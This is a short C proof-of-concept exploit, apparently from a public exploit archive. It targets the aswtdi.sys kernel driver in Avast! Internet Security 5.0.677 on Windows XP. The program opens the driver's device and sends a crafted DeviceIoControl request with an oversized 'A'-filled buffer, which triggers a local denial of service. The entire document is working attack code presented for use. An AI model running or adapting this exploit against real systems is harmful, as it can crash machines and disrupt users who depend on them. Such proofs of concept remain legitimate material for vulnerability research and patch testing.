/*
# Exploit Title: Avast! Internet Security aswtdi.sys 0day Local DoS PoC
# Date: 2010-11-04
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.avast.com
# Version: up to date, version 5.0.677, aswtdi.sys version 5.0.677
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <share.h>
int main(int argc, char **argv)
{
HANDLE hDevice;
DWORD cb;
void *buff;
int len = 0;
int pfh;
int outlen = 0, inlen = 0;
DWORD ioctl = 0x800515A8;
char deviceName[] = "\\\\.\\aswTdi";
if ( (hDevice = CreateFileA(deviceName,
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
cb = 0;
buff = malloc(0x2000);
if(!buff){
printf("malloc failed");
return 0;
}
memset(buff, 'A', 0x2000-1);
ioctl = 0x80000004;
inlen = 4;
outlen = 4;
DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff,
outlen, &cb, NULL);
free(buff);
printf("done!");
}
